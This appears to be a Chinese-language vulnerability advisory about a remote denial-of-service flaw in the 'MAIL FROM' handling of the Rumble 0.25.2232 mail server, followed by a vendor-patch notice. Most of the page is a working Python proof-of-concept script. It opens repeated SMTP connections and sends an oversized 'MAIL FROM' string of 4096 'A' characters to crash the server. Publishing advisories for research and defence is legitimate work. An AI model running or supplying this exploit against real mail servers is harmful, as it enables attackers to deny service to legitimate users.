影响版本:
Humbedooh Rumble 0.25.2232
漏洞描述:
Rumble是以ANSI C编写的邮件服务器,对大多数服务和邮件扩展实现模块化管理。 Rumble邮件服务器在"MAIL FROM"命令的实现上存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成受影响应用程序崩溃,拒绝服务合法用户。
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
import socket
host = 'localhost'
tld = 'mydomain.tld'
port = 25
def crash():
for i in range(0, 16):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(32)
junk = 'A' * 4096
print s.recv(8192)
s.send('HELO ' + tld + '\r\n')
print s.recv(8192)
s.send('MAIL FROM ' + junk + '\r\n')
print s.recv(8192)
s.close()
crash()
安全建议:
厂商补丁: Rumble ------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://rumbleserver.sourceforge.net/
0 条评论。